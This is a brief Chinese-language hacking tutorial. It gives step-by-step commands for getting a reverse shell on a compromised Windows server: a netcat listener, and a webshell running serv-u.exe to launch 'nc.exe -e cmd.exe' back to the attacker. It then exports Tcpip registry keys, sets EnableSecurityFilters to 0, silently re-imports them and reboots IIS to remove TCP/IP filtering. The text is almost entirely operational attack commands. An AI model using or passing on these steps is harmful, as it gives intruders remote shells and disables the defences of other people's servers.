1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行:x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"得到一个shell2.CMD下导出注册表文件C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TcpipC:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TcpipC:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip修改各文件 EnableSecurityFilters 处将最后的1改为03.将注册表文件导入x:\xxx>regedit -s 1.regx:\xxx>regedit -s 2.regx:\xxx>regedit -s 3.reg-S 为无提示重启命令 iisreset /reboot完成TCP/IP筛选限制